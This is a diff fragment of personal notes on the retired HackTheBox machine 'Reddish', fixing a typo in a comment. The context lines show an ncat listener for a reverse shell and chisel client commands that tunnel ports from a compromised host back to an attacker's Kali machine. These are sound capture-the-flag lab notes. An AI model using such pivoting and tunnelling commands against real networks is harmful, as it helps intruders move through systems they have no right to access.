7RU7H/CTFs/HackTheBox/Retired-Machines/Reddish/Reddish-Notes.md

 rlwrap ncat -lvnp 10007
 # Then on the www machine as Root
 # Create a tunnel with chisel back to NodeRed client
-# nodered = 10000 because the kali serveris 10000
+# nodered = 10000 because the kali server is 10000
 nohup ./chisel client kali:10000 10007:127.0.0.1:10000
 # www - to open 10007 on kali
 nohup ./chisel client 172.19.0.4:10007 10007:127.0.0.1:10007 &